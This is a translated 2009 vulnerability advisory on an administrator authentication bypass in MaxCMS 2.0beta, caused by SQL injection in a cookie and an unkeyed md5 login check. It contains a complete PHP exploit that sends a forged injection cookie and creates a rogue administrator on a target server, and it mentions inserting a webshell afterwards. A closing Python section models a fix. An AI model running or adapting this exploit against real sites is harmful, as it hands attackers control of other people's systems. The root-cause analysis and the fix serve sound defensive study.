MaxCMS 2.0beta (maxcms) administrator authentication bypass vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62200922095
Type myhack58
Reporter Anonymous
Modified 2009-02-08T00:00:00


by flyh4t

The maxcms admin backend has an auto-upgrade function; the injection in the ajax code has been patched, but this vulnerability has not. After the previous patch I looked with a classmate at whether the authentication could be bypassed. The answer is yes, but on the premise that the path of the admin directory is known.

Look at the vulnerable code:

Sub checkPower
    dim loginValidate,rsObj : loginValidate = "maxcms2.0"
    err.clear
    on error resume next
    ' the username is taken straight from the cookie and concatenated into the query
    set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")
    ' the check value is an unkeyed md5 over the User-Agent, the client IP and m_random
    loginValidate = md5(getAgent&getIp&rsObj(0))
    if err then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
    if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"
    checkManagerLevel rsObj(1)
    set rsObj=nothing
End Sub


Function rCookie(cookieName)
    rCookie = request.cookies(cookieName)
End Function

The key is the value of the variable loginValidate = md5(getAgent&getIp&rsObj(0)). With forged cookies this authentication check can easily be bypassed, after which a new administrator can be added, or the configuration file modified to insert a one-line Trojan (webshell).

Here is an exploit that adds a new administrator:

<?php
print_r('
+---------------------------------------------------------------------------+
maxcms2.0 creat new admin exploit
by Flyh4t
team:wolvez security team
+---------------------------------------------------------------------------+
');

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to maxcms
Example: php '.$argv[0].' localhost /maxcms2/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$name = rand(1,10000);
$cmd  = 'm_username=flyh4t'.$name.'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0';

$resp = send($cmd);
if (!eregi('alert',$resp)) { echo "[~]bad luck,exploit failed"; exit; }

print_r('
+---------------------------------------------------------------------------+
[+]cool,exploit seccuss
[+]you have add a new adminuser flyh4t'.$name.'/wolvez
+---------------------------------------------------------------------------+
');

function send($cmd)
{
    global $host, $path;
    $message  = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
    $message .= "Accept: /\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: flyh4t\r\n";
    $message .= "X-Forwarded-For:\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Cookie: m_username=flyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checkflyh4t'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=7728a57dcd5ae1e69cf0aee02ba66de6\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    echo $message;

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
    echo $resp;
    return $resp;
}
?>
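The two defects behind this bypass are the concatenated query in checkPower and a check value derived only from client-supplied inputs. The following Python model, added here as an illustration and not code from maxcms or the author, shows both fixes side by side: the lookup is parameterised, and the check value becomes an HMAC under a server-side key (SERVER_KEY, make_db and the table contents are assumptions for the example).

```python
import hashlib
import hmac
import secrets
import sqlite3

# Constructed stand-in for the {pre}manager table; the row is example data.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE manager (m_username TEXT, m_random TEXT, m_level INTEGER)")
    db.execute("INSERT INTO manager VALUES ('admin', ?, 0)", (secrets.token_hex(16),))
    return db

# Hypothetical server-side key: it lives only in server configuration, never in a
# cookie or in a table the login query can read, so a client cannot learn it.
SERVER_KEY = secrets.token_bytes(32)

def legacy_token(agent, ip, m_random):
    """The page's loginValidate = md5(getAgent & getIp & m_random): every input is
    sent by the client (User-Agent, forwarded IP) or, through the concatenated
    query, chosen by the client, so the client can compute it without any secret."""
    return hashlib.md5((agent + ip + m_random).encode()).hexdigest()

def keyed_token(username, m_random):
    """Hardened form: a MAC under SERVER_KEY, bound to the account and its m_random."""
    return hmac.new(SERVER_KEY, f"{username}|{m_random}".encode(), hashlib.sha256).hexdigest()

def lookup_manager(db, username):
    """Parameterised replacement for the concatenated query: a quote or UNION in
    the cookie value is just characters inside the bound parameter."""
    return db.execute(
        "SELECT m_random, m_level FROM manager WHERE m_username = ?", (username,)
    ).fetchone()

def check_power(db, cookies):
    """Returns m_level when the 'check<username>' cookie is valid, else None
    (where the original redirects to index.asp?action=login)."""
    username = cookies.get("m_username", "")
    row = lookup_manager(db, username)
    if row is None:
        return None
    m_random, m_level = row
    presented = cookies.get("check" + username, "")
    # constant-time comparison of the presented cookie against the keyed value
    if not hmac.compare_digest(presented, keyed_token(username, m_random)):
        return None
    return m_level
```

With the keyed form, a client who knows its own User-Agent, IP and even m_random still cannot produce a valid check cookie, and the injected username simply matches no row.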